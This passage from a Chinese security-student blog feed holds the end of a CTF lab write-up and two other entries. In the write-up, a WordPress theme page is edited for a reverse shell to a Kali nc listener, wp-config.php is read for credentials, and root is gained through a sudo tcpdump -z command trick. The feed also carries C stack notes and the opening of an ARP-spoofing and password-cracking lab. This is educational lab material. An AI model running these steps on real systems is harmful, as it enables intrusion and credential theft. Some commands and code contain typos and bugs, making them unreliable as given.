src="https://img-blog.csdnimg.cn/20201215213331854.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>这是更改版本27为26后的提交,成功了。↓</p><p><img src="https://img-blog.csdnimg.cn/20201215213708294.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>然后要注意Appearance→Themes界面,这里选定的还是27版本,我们要把这里也更新为26版本 。↓</p><p><img src="https://img-blog.csdnimg.cn/20201215213753507.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>如果不更改Themes,则会在访问404页面时出现这样的错误情况。↓</p><p><img src="https://img-blog.csdnimg.cn/2020121521403826.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>而更改后的Themes界面是这样的。↓</p><p><img src="https://img-blog.csdnimg.cn/20201215214100851.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>访问404页面成功是这样的。↓</p><p><img src="https://img-blog.csdnimg.cn/20201215214243312.jpg#pic_center" alt="在这里插入图片描述"></p><h4 id="补充"><a href="#补充" class="headerlink" title="补充"></a>补充</h4><p>==扩==:我在这里补充一下我做这个步骤的一些个人经验。</p><ol><li>咱们先说说这个404页面,404页面代表不存在,那我们在ip后随便接个路由,就比如<code>http://192.168.238.134/404.php</code>,得到的页面是这样的。↓</li></ol><p> <img src="https://img-blog.csdnimg.cn/20201215214617822.jpg#pic_center" alt="在这里插入图片描述"></p><p> 大家注意,这个404是Apache给的,不是这个网站搭建时设置的页面,所以访问这种页面时没法继续实验的。<br> 还有就是怎么确定网站搭建的404页面路径。↓</p><p> <img src="https://img-blog.csdnimg.cn/20201215214837730.jpg#pic_center" alt="在这里插入图片描述"></p><p> 说实话,我在网站后台找半天也没找到404页面的路径,这个我之所以能访问到是因为指导书上有……,我咨询别人,给我的答案就是逻辑推理……emm。推理就是从咱们<strong>第六步Dirb爆破网站使用目录</strong>得到的那张图↓开始……emm。</p><p> <img src="https://img-blog.csdnimg.cn/20201215215014382.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p> 这种方法我不是很想用,所以我又用了一种<strong>新的方法</strong>实现这个步骤,就不用404页面了,后面我会说的。</p><ol start="2"><li><p>第二个就是版本更换问题,即27和26之间的爱恨情仇,为啥更换就好使的原因我没有去深究,不过知道更换版本好使对于这个实验就够用了。<br> 其实不是非得都保持26,这个看你更改时的版本是多少,比如说你要粘贴代码时右上角版本是27,更新文件会失败,这时就要更改版本为26;如果粘贴代码时右上角是26,更新文件也会失败,这时就要更改版本为27。至于版本25在我的实验中一直出问题。</p></li><li><p>下面我就要介绍我自己做这个实验步骤的方法了。<br>既然404页面的路径不好推,那咱们就自己选定一个页面,比如说我在这里选定page.php界面。↓</p></li><li><p><img src="https://img-blog.csdnimg.cn/20201215223326743.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p></li></ol><p> 咱们在Page里添加新页面。↓</p><p> <img src="https://img-blog.csdnimg.cn/20201215223331430.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p> 命名完页面名后(不是一定要和文件名一个名),选择路径。↓</p><p> <img src="https://img-blog.csdnimg.cn/20201215223621100.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p> 然后就是熟悉的更改版本,粘贴代码,更新文件。↓</p><p> <img src="https://img-blog.csdnimg.cn/2020121522370285.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p> 最后我们可以通过<code>Preview</code>访问页面。↓</p><p> <img src="https://img-blog.csdnimg.cn/20201215223743430.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p> 结果如下。↓</p><p> <img src="https://img-blog.csdnimg.cn/20201215223901746.jpg#pic_center" alt="在这里插入图片描述">也可以通过路径来访问,结果依旧成功。↓</p><p> <img src="https://img-blog.csdnimg.cn/20201215223928745.jpg#pic_center" alt="在这里插入图片描述"></p><p> 不过我们要注意,不论是用404页面还是自己选的页面,==在访问前在Kali中利用NC开始监听,攻击者浏览器访问修改的PHP页面。从而得到反弹shell==。</p><p> 开始监听↓</p><p> <img src="https://img-blog.csdnimg.cn/20201215224314859.jpg#pic_center" alt="在这里插入图片描述"></p><p> 访问页面后所监听到的。↓</p><p> <img src="https://img-blog.csdnimg.cn/20201215224203865.jpg#pic_center" alt="在这里插入图片描述"></p><p> 然后找到wp-config.php文件<br> (网站模板建立时的路径一般是固定的,所以我们直接cd过去就行)<br> 命令 <code>cd /var/www/html</code><img src="https://img-blog.csdnimg.cn/20201215224643623.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p> 命令 <code>ls</code></p><p> <img src="https://img-blog.csdnimg.cn/20201215224655170.jpg#pic_center" alt="在这里插入图片描述"></p><p> 建立会话 <code>cat wp-config.php</code></p><p> <img src="https://img-blog.csdnimg.cn/20201215225740435.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h3 id="12-SSH登录服务器"><a href="#12-SSH登录服务器" class="headerlink" title="12. SSH登录服务器"></a>12. SSH登录服务器</h3><p>尝试查看/root/flag.txt</p><p><img src="https://img-blog.csdnimg.cn/20201215230041101.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>管理员命令也不行</p><p><img src="https://img-blog.csdnimg.cn/20201215230125420.jpg#pic_center" alt="在这里插入图片描述"></p><p>都没办法查看。↑</p><h3 id="13-使用tcpdump执行任意命令"><a href="#13-使用tcpdump执行任意命令" class="headerlink" title="13. 使用tcpdump执行任意命令"></a>13. 使用tcpdump执行任意命令</h3><p>(当tcpdump捕获到数据包后会执行指定的命令。)<br>查看当前身份可执行的命令。</p><p><img src="https://img-blog.csdnimg.cn/20201215230211856.jpg#pic_center" alt="在这里插入图片描述"></p><p>既然可以用root权限执行tcpdump命令 <code>touch /tmp/exploit</code> 那可以创建攻击文件了。↓<br>(创建后我查看了一番,找到了创建的文件)</p><p><img src="https://img-blog.csdnimg.cn/20201215230307212.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>下面三行命令分别是</p><ol><li><p>写入shellcode <code>echo 'cat/root/flag.txt' > /tmp.exploit</code>;</p></li><li><p>赋予可执行权限 <code>chmod +x/tmp/exploit</code>;</p></li><li><p>利用tcpdump执行任意命令 <code>sudo tcpdump -i eth0 -w /dev/null -w 1 -G 1 -z /tmp/exploit -Z root</code></p></li></ol><p> <img src="https://img-blog.csdnimg.cn/20201215230442194.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p> 最后得到图中红色方框内的结果。↑</p>]]></content>
<summary type="html"><h2 id="实验目的"><a href="#实验目的" class="headerlink" title="实验目的"></a>实验目的</h2><p>通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作</summary>
<category term="Network Penetration" scheme="http://example.com/categories/Network-Penetration/"/>
<category term="experiment" scheme="http://example.com/tags/experiment/"/>
</entry>
<entry>
<title>栈和队列</title>
<link href="http://example.com/2020/11/25/%E6%A0%88%E5%92%8C%E9%98%9F%E5%88%97/"/>
<id>http://example.com/2020/11/25/%E6%A0%88%E5%92%8C%E9%98%9F%E5%88%97/</id>
<published>2020-11-25T11:21:12.000Z</published>
<updated>2022-03-18T06:03:46.023Z</updated>
<content type="html"><![CDATA[<h2 id="理解栈"><a href="#理解栈" class="headerlink" title="理解栈"></a>理解栈</h2><p>栈是一个<strong>特殊的线性表</strong>,它最特的地方就是它的操作被限制在了栈顶,栈底是<strong>固定的</strong>,操作也就只有<strong>入栈</strong>和<strong>出栈</strong>。</p><blockquote><p>最先进栈的元素不是只能最后出栈。</p></blockquote><p>栈只是对入栈出栈的位置进行了限制,但是没有对进出时间有限制。</p><h2 id="栈的存储结构"><a href="#栈的存储结构" class="headerlink" title="栈的存储结构"></a>栈的存储结构</h2><h3 id="顺序存储"><a href="#顺序存储" class="headerlink" title="顺序存储"></a>顺序存储</h3><h4 id="栈的结构定义"><a href="#栈的结构定义" class="headerlink" title="栈的结构定义"></a>栈的结构定义</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">typedef int DataType;</span><br><span class="line">struct SeqStack</span><br><span class="line">{</span><br><span class="line">int MAX; //最大容量</span><br><span class="line">int top; //栈顶指针</span><br><span class="line">DataType *elem; //存放元素的起始指针</span><br><span class="line">};</span><br><span class="line">typedef struct SeqStack *SeqStack;</span><br></pre></td></tr></table></figure><h4 id="栈的创建"><a href="#栈的创建" class="headerlink" title="栈的创建"></a>栈的创建</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">SeqStack SetNullStack_Seq(int m) //创建空顺序栈</span><br><span class="line">{</span><br><span class="line">SeqStack sstack = (SeqStack)malloc(sizeof(struct SeqStack));</span><br><span class="line">if (sstack != NULL){</span><br><span class="line">sstack->elem = (int*)malloc(sizeof(int)*m);</span><br><span class="line">if (sstack->elem != NULL){</span><br><span class="line">sstack->MAX = m;</span><br><span class="line">sstack->top = -1;</span><br><span class="line">return(sstack);</span><br><span class="line">}</span><br><span class="line">else {</span><br><span class="line">free(sstack);</span><br><span class="line">return NULL;</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">else{</span><br><span class="line">printf("out of space");</span><br><span class="line">return NULL;</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h4 id="栈的判空"><a href="#栈的判空" class="headerlink" title="栈的判空"></a>栈的判空</h4><p>判断top值是否为-1来判断栈是否为空,因为一般栈的首元素插入都是在‘0’这个位置,就像插入数组的第一位。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">int IsNullStack_seq(SeqStack sstack) </span><br><span class="line">{</span><br><span class="line"> return(sstack->top == -1);</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h4 id="顺序进栈"><a href="#顺序进栈" class="headerlink" title="顺序进栈"></a>顺序进栈</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">void Push_seq(SeqStack sstack, int x) //入栈</span><br><span class="line">{</span><br><span class="line">if (sstack->top >= (sstack->MAX - 1)) //检查栈是否满</span><br><span class="line">printf("overflow! \n");</span><br><span class="line">else{</span><br><span class="line">sstack->top++; //若不满,先修改栈顶变量</span><br><span class="line">sstack->elem[sstack->top] = x;//把元素x放到栈顶变量的位置中</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h4 id="顺序出栈"><a href="#顺序出栈" class="headerlink" title="顺序出栈"></a>顺序出栈</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">void Pop_seq(SeqStack sstack)//出栈</span><br><span class="line">{</span><br><span class="line">if (IsNullStack_seq(sstack)) //判断栈是否为空</span><br><span class="line">printf("Underflow!\n");</span><br><span class="line">else</span><br><span class="line">sstack->top = sstack->top - 1;//栈顶减1</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h4 id="拓:求栈顶元素"><a href="#拓:求栈顶元素" class="headerlink" title="拓:求栈顶元素"></a>拓:求栈顶元素</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">DataType Top_seq(SeqStack sstack)//求栈顶元素的值</span><br><span class="line">{</span><br><span class="line">if (IsNullStack_seq(sstack))//判断sstack所指的栈是否为空栈</span><br><span class="line">{</span><br><span class="line">printf("it is empty");</span><br><span class="line">return 0;</span><br><span class="line">}</span><br><span class="line">else</span><br><span class="line">return sstack->elem[sstack->top];</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>入栈和出栈都无循环语句,所以时间复杂度均是O(1)。</p><h3 id="链式存储"><a href="#链式存储" class="headerlink" title="链式存储"></a>链式存储</h3><p>链栈是栈顶放在单链表的头部(失去意义的头结点可以不要),基本不存在栈满的情况。<br>栈链的操作绝大部分和单链表类似,只是在插入和删除上,特殊一些</p><h4 id="栈的结构定义-1"><a href="#栈的结构定义-1" class="headerlink" title="栈的结构定义"></a>栈的结构定义</h4><p>有头结点的结构</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">typedef int DataType;</span><br><span class="line">struct Node{</span><br><span class="line">DataType data;</span><br><span class="line">struct Node* next;</span><br><span class="line">};</span><br><span class="line">typedef struct Node *PNode;</span><br><span class="line">typedef struct Node *LinkStack;</span><br></pre></td></tr></table></figure><p>无头结点的结构</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">typedef int Status; </span><br><span class="line">typedef int SElemType; /* SElemType类型根据实际情况而定,这里假设为int */</span><br><span class="line"></span><br><span class="line">typedef struct StackNode</span><br><span class="line">{</span><br><span class="line">SELemType data;</span><br><span class="line">struct StackNode *next;</span><br><span class="line">}StackNode,*LinkStackPtr;</span><br><span class="line"></span><br><span class="line">typedef struct LinkStack</span><br><span class="line">{</span><br><span class="line">LinkStackPtr top;</span><br><span class="line">int count;</span><br><span class="line">}LinkStack;</span><br></pre></td></tr></table></figure><h4 id="栈的创建-1"><a href="#栈的创建-1" class="headerlink" title="栈的创建"></a>栈的创建</h4><p>有头结点的创建</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">LinkStack SetNullStack_Link() //创建带有头结点的空链栈</span><br><span class="line">{</span><br><span class="line">LinkStack top = (LinkStack)malloc(sizeof(struct Node));</span><br><span class="line">if (top != NULL) top->next = NULL;</span><br><span class="line">else printf("Alloc failure");</span><br><span class="line">return top; //返回栈顶指针</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>无头结点的创建</p><p>“把S置为空栈”个人认为是保险措施,在有头结点的创建中可以尝试使用。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">/* 构造一个空栈S */</span><br><span class="line">Status InitStack(LinkStack *S)</span><br><span class="line">{ </span><br><span class="line"> S->top = (LinkStackPtr)malloc(sizeof(StackNode));</span><br><span class="line"> if(!S->top)</span><br><span class="line"> return 0;</span><br><span class="line"> S->top=NULL;</span><br><span class="line"> S->count=0;</span><br><span class="line"> return OK;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">/* 把S置为空栈 */</span><br><span class="line">Status ClearStack(LinkStack *S)</span><br><span class="line">{ </span><br><span class="line"> LinkStackPtr p,q;</span><br><span class="line"> p=S->top;</span><br><span class="line"> while(p)</span><br><span class="line"> { </span><br><span class="line"> q=p;</span><br><span class="line"> p=p->next;</span><br><span class="line"> free(q);</span><br><span class="line"> } </span><br><span class="line"> S->count=0;</span><br><span class="line"> return OK;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h4 id="栈的判空-1"><a href="#栈的判空-1" class="headerlink" title="栈的判空"></a>栈的判空</h4><p>有头结点的链栈判空</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">int IsNullStack_link(LinkStack top) //判断一个链栈是否为空</span><br><span class="line">{</span><br><span class="line">if (top->next == NULL)</span><br><span class="line">return 1;</span><br><span class="line">else</span><br><span class="line">return 0;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>无头结点的链栈判空</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">Status StackEmpty(LinkStack S)</span><br><span class="line">{ </span><br><span class="line"> if (S.count==0)</span><br><span class="line"> return 1;</span><br><span class="line"> else</span><br><span class="line"> return 0;</span><br><span class="line">}</span><br><span class="line"></span><br></pre></td></tr></table></figure><h4 id="链式进栈"><a href="#链式进栈" class="headerlink" title="链式进栈"></a>链式进栈</h4><p>有头结点的进栈</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">void Push_link(LinkStack top, DataType x) //进栈</span><br><span class="line">{</span><br><span class="line">PNode p;</span><br><span class="line">p = (PNode)malloc(sizeof(struct Node));</span><br><span class="line">if (p == NULL)</span><br><span class="line">printf("Alloc failure");</span><br><span class="line">else</span><br><span class="line">{</span><br><span class="line">p->data = x;</span><br><span class="line">p->next = top->next;</span><br><span class="line">top->next = p;</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>无头结点的进栈</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">/* 插入元素e为新的栈顶元素 */</span><br><span class="line">Status Push(LinkStack *S,SElemType e)</span><br><span class="line">{</span><br><span class="line"> LinkStackPtr s=(LinkStackPtr)malloc(sizeof(StackNode)); </span><br><span class="line"> s->data=e; </span><br><span class="line"> s->next=S->top;/* 把当前的栈顶元素赋值给新结点的直接后继,见图中① */</span><br><span class="line"> S->top=s; /* 将新的结点s赋值给栈顶指针,见图中② */</span><br><span class="line"> S->count++;</span><br><span class="line"> return OK;</span><br><span class="line">}</span><br><span class="line"></span><br></pre></td></tr></table></figure><h4 id="链式出栈"><a href="#链式出栈" class="headerlink" title="链式出栈"></a>链式出栈</h4><p>有头结点的出栈</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">void Pop_link(LinkStack top)// 删除栈顶元素</span><br><span class="line">{</span><br><span class="line">PNode p;</span><br><span class="line">if (top->next == NULL)</span><br><span class="line">printf("it is empty stack!");</span><br><span class="line">else</span><br><span class="line">{</span><br><span class="line">p = top->next;</span><br><span class="line">top->next = p->next;</span><br><span class="line">free(p);</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>无头结点的出栈<br>(这个直接自带获取栈顶元素的部分)</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">/* 若栈不空,则删除S的栈顶元素,用e返回其值,并返回OK;否则返回ERROR */</span><br><span class="line">Status Pop(LinkStack *S,SElemType *e)</span><br><span class="line">{ </span><br><span class="line"> LinkStackPtr p;</span><br><span class="line"> if(StackEmpty(*S))</span><br><span class="line"> return ERROR;</span><br><span class="line"> *e=S->top->data;</span><br><span class="line"> p=S->top;/* 将栈顶结点赋值给p,见图中③ */</span><br><span class="line"> S->top=S->top->next; /* 使得栈顶指针下移一位,指向后一结点,见图中④ */</span><br><span class="line"> free(p); /* 释放结点p */ </span><br><span class="line"> S->count--;</span><br><span class="line"> return OK;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h4 id="拓:求栈顶元素-1"><a href="#拓:求栈顶元素-1" class="headerlink" title="拓:求栈顶元素"></a>拓:求栈顶元素</h4><p>有头结点</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">DataType Top_link(LinkStack top)// 求栈顶元素的值</span><br><span class="line">{</span><br><span class="line">if (top->next == NULL)</span><br><span class="line">{</span><br><span class="line">printf("It is empty stack!");</span><br><span class="line">return 0;</span><br><span class="line">}</span><br><span class="line">else</span><br><span class="line">return top->next->data;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>入栈和出栈都无循环语句,所以时间复杂度均是O(1)。</p><h3 id="双栈对比"><a href="#双栈对比" class="headerlink" title="双栈对比"></a>双栈对比</h3><ol><li>时间复杂度都为O(1)</li><li>顺序栈:若元素变化范围可控,即长度固定,则用顺序栈好一些(<strong>优势:存取时定位方便</strong>)</li><li>链栈:若元素变化范围不可控,即长度不固定,则用链栈好一些(<strong>优势:可以很大!</strong>)</li></ol><h2 id="栈的拓展"><a href="#栈的拓展" class="headerlink" title="栈的拓展"></a>栈的拓展</h2><p>==正在开发ing…………==</p>]]></content>
<summary type="html"><h2 id="理解栈"><a href="#理解栈" class="headerlink" title="理解栈"></a>理解栈</h2><p>栈是一个<strong>特殊的线性表</strong>,它最特的地方就是它的操作被限制在了栈顶,栈底是<strong>固定的</st</summary>
<category term="Data Structure" scheme="http://example.com/categories/Data-Structure/"/>
<category term="note" scheme="http://example.com/tags/note/"/>
</entry>
<entry>
<title>Network sniffing & identity authentication</title>
<link href="http://example.com/2020/11/10/Network%20sniffer%20&%20Identity%20authentication/"/>
<id>http://example.com/2020/11/10/Network%20sniffer%20&%20Identity%20authentication/</id>
<published>2020-11-10T03:50:56.000Z</published>
<updated>2022-03-18T06:03:46.014Z</updated>
<content type="html"><![CDATA[<h2 id="实验目的"><a href="#实验目的" class="headerlink" title="实验目的"></a>实验目的</h2><ul><li>通过使用Wireshark软件掌握Sniffer(嗅探器)工具的使用方法,实现捕捉HTTP等协议的数据包,以理解TCP/IP协议中多种协议的数据结构、通过实验了解HTTP等协议明文传输的特性</li><li>研究交换环境下的Network sniffing实现及防范方法,研究并利用ARP协议的安全漏洞,通过Arpspoof实现ARP欺骗以捕获内网其他用户数据</li><li>能利用BrupSuite实现网站登录暴力破解获得登录密码</li><li>能实现ZIP密码破解,理解安全密码的概念和设置<h2 id="系统环境"><a href="#系统环境" class="headerlink" title="系统环境"></a>系统环境</h2></li><li>Kali Linux 2、Windows<h2 id="网络环境"><a href="#网络环境" class="headerlink" title="网络环境"></a>网络环境</h2></li><li>交换网络结构<h2 id="实验工具"><a href="#实验工具" class="headerlink" title="实验工具"></a>实验工具</h2></li><li>Arpspoof、WireShark、BurpSuite、fcrackzip(用于zip密码破解)<h2 id="实验步骤和内容"><a href="#实验步骤和内容" class="headerlink" title="实验步骤和内容"></a>实验步骤和内容</h2><h3 id="网络嗅探部分"><a href="#网络嗅探部分" class="headerlink" title="网络嗅探部分"></a>网络嗅探部分</h3></li><li>网络嗅探:Wireshark 监听网络流量,抓包。</li><li>ARP欺骗: ArpSpoof,实施ARP欺骗。</li><li>防范: 防范arp欺骗。</li></ul><h4 id="sniffer-Wireshark-抓包"><a href="#sniffer-Wireshark-抓包" class="headerlink" title="sniffer(Wireshark)抓包"></a>sniffer(Wireshark)抓包</h4><p>这里选择kali为攻击方主机A,Metasplotis为被抓方主机B。<br>这里先查一下A主机的ip</p><p><img src="https://img-blog.csdnimg.cn/2020110816021192.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br>然后<code>nmap -sP</code>来看一下B主机和A主机是否在一个网段</p><p><img src="https://img-blog.csdnimg.cn/20201108160416449.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" 